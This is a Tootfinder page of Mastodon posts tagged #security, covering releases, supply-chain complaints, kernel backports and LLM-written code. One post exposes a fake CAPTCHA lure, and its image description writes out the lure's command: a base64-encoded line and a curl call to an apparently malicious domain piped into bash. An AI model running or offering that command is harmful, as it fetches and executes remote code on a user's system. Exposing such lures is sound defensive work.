Tootfinder

Opt-in global Mastodon full text search. Join the index!

@matthiasott@mastodon.social
2026-05-06 07:18:19

#Webmention for Craft v1.3.0 is out 🎉 – first in a short series of #security releases. 🔒
Fixes a stored XSS vulnerability in author/entry URLs, adds per-IP rate limits, and failure-backoff to harden the public endpoint against abuse.
Upgrade recommended!

@mgorny@social.treehouse.systems
2026-04-08 13:30:38

Fun post pointed out by Werner Koch on the GPG "post-quantum defaults" thread:
#cryptography #QuantumCryptography #security

@mgorny@social.treehouse.systems
2026-05-07 05:17:44

Everyone loves jeering at vibecoded #GitHub being down all the time. Yet for some reason people still neglect to question making #Microsoft the primary guarantor of their software's supply chain #security. And the whole attestation nonsense that doesn't really protect against the most likely attack vectors.

@kubikpixel@chaos.social
2026-04-20 05:05:46

«Security: This library has not undergone any third-party security audit. Usage is at own risk.»
If something like this is written on a code library, the confidence in your security is much higher than if commercial blenders want to advertise absolute IT security and there are the safest — especially when the commercial goals still list ratings in this way.
#security

@frankel@mastodon.top
2026-04-14 17:23:25

#OpenSource #security at Astral
astral.sh/blog/open-source-sec

@crepererum@mastodon.online
2026-02-18 20:04:26

First blog post of the year:
#Rust #Security

@frankstohl@mastodon.social
2026-04-27 09:40:23

Wenn Politiker auf die billigste Phishing-Attacke reinfallen, was ist dann die Gegenmaßnahme? #Phishing #Politik #Security

@kaiengert@mastodon.social
2026-03-25 14:50:34

Please help with testing a new
#Thunderbird #Security feature: Unobtrusive Signatures, a novel mechanism for digitally signing email, currently implemented for #OpenPGP.
It avoids the u…

@vosje62@mastodon.nl
2026-02-19 13:59:18

RE: #Gemini #GoogleCoin #security

@vague@social.linux.pizza
2026-03-27 15:38:25

I understand #security is important and all, but getting logged out from #Teams and email frequently because MS thinks the auth cookie needs to be renewed is mighty irritating to say the least. To say more, I swear loudly every time I have to login again. Just fucking let me be.

@UP8@mastodon.social
2026-03-09 16:34:07

🤦🏿‍♀️ Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
#security

@cyrevolt@mastodon.social
2026-04-12 14:49:28

On the #security issue with #AI detectors
For proper vuln research and disclosure, you need 3 parts:
1. a valid exploit, provable
2. an explanation of how it works
3. a solution to fix it and roll out an upgrade
Often enough, when the first part is done, people are like "…

@almad@fosstodon.org
2026-04-19 21:49:48

Oh wow. I guess it's "lazy and smart" in a way (and only gives you three attempts at loading, then 401)
#security

A screenshot of a website verification page for portal.secure-access.com. At the top, the URL "portal.secure-access.com" is displayed above a badge that reads "✓ PROTECTED BY SECUREVERIFY". A central white card contains the heading "Just One Sec..." and the text "We're verifying your connection to keep this site secure." The card features badges for "✓ 256-b 256-bit SSL", "☑ Verified", and "Ⓤ Secure", plus a green-outlined box that reads "✓ I'm not a robot" and "Click to verify — code will be c…
A snippet of code on a black background, appearing as if from a terminal window. The first line of text is: echo "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZ "Y3VybCAtcyAnaHR0cHM6Ly93aTVtc2FyZW4uZGlnaXRhbC9zY3JpcHQu2gnIHwgYmFzaA==" | | base64 -d. The second line of text is: curl -s 'https://wi5msaren.digit 'https://wi5msaren.digital/script.sh' | bash%, followed by a small black square.
@usul@piaille.fr
2026-02-23 11:40:56

If the browser maker you are using is able to pull off something similar than what's described in this video, then it's a safe browser to use.
youtube.com/watch?app=desktop&

@eingfoan@infosec.exchange
2026-03-16 19:02:42

Is there a guide how to integrate #SIEM systems and #VideoSuvailance systems vor General alarming systems for having physical and Cyber #security in one Palace (if company is not that large ...…

@mgorny@social.treehouse.systems
2026-04-15 05:00:43

The state of #security these days: #Python #virtualenv package now includes SHA256 sums of their bundled wheels, declaring that it protects against "supply-chain compromise". Because obviously there are so many attack vectors that permit you to alter a .whl file but not the .py file in the same directory.
No, I'm not saying verifying checksum makes no sense, because indeed it can save some pain if fs is damaged somehow. However, calling this a "security" feature is a misnomer at best, and openly giving people false sense of security at worst.

@chris@mstdn.chrisalemany.ca
2026-02-25 17:28:58

Wow, so 1Password has increased its already expensive services. I have only used it for work/volunteer related stuff. I've been using Apple's Keychain and now Passwords App for years.
If you're on a Mac/iOS system and want to switch, 9to5 has a good run down on how to export your 1Password database and bring it into Passwords.
if you've never used a Password Manager, you really really should.
#Security #Passwords #Apple #1Password #PasswordManager
9to5mac.com/2026/02/25/heres-h

@mgorny@social.treehouse.systems
2026-05-05 05:25:48

#Python #cryptography library (yes, the one that criticizes everything and everyone) is now vibecoded. Our future is truly bright!
Noticed because apparently "Claude" wrote a test that OOM-ed my system. But hey, #RustLang protects against memory errors, so it's fine to vibecode your security critical components.
#security #AI #LLM #NoAI #NoLLM

@mgorny@social.treehouse.systems
2026-04-30 05:38:38

So you read about #CopyFail, and are like… owww, shit. But then you see that it was responsibly disclosed after being fixed in main, we had releases since, they went stable in #Gentoo (over other #security fixes), so we should be good, right?
Except that it turns out that after it has been fixed in mainline, nobody bothered actually backporting the fix to all the LTS branches. And it doesn't apply cleanly (#Gentoo #Linux

@mgorny@social.treehouse.systems
2026-05-02 05:55:56

Greg Kroah-Hartman: "If you look there are thousands of unfixed CVEs in the older LTS kernels right now, and if distros or users that rely on those older branches wish to see those resolved, they need to provide working backports to us to apply, as our first attempt did not work (which is why they are unfixed in those branches.)"
Really asking for a "Pray tell us", given that nobody actually bothered disclosing the problem to downstreams and that the commit message was hiding it.
Either way, apparently the great LLM-backed patch backporting process that #NVidia is so proud of doesn't really work. Upstream doesn't really care about #LTS branches, and they should be considered insecure by default.
#Gentoo #Linux #CopyFail #security

@frankstohl@mastodon.social
2026-04-09 17:38:15

Macht Microsoft WireGuard kaputt? #vpn #wireguard #security #windows

@mgorny@social.treehouse.systems
2026-03-19 12:23:26

Proper #security nightmare time.
#LMDB is a database that's designed to operate on trusted input. Upstream has historically rejected all bug reports regarding problems with malformed input.
Py-LMDB project provides #Python bindings to LMDB that are normally built against bundled LMDB. Someone recently started mass-filing "untrusted input" vulnerabilities against py-lmdb, and py-lmdb started #slop - coding fixes to their bundled LMDB. Of course, nobody even bothered reporting most of these bugs upstream, and the one that I've seen reported was rejected as "don't do that".
Py-LMDB supports building against system LMDB, and #Gentoo was doing that so far. However, now we are facing a problem: system LMDB operates under the assumption that it is working on trusted input, while py-lmdb (and its bundled LMDB) operates under the assumption that it may be working with untrusted input. The guarantees no longer align.
If we continue to use system LMDB (and skip all the added slop tests that literally cause Python to crash), then Gentoo's py-lmdb package will now have different input expectations than upstream py-lmdb. And of course we can't just remove that crap because someone added exactly one package (TorchVision, i.e. part of the plagiarism machine suite) depending on it.
bugs.gentoo.org/971352

@mgorny@social.treehouse.systems
2026-03-16 04:40:34

Modern use of LLMs often involves giving them access to the local system: to read and write your project files, and to execute arbitrary commands, often unsupervised. So aren't people worried about a harness just doing what a remote #LLM tells it to do?
I think a statement I've heard lately summarizes the mindset well. It went something along the lines "I can't give you 100% guarantee, but I've noticed that LLMs are very good at following instructions, and they're getting better and better, so I don't worry about that anymore".
Like, it is completely fine to introduce a humongous security hole, because the probability that a model will *accidentally* do something horrible is decreasing.
#AI #NoAI #NoLLM #security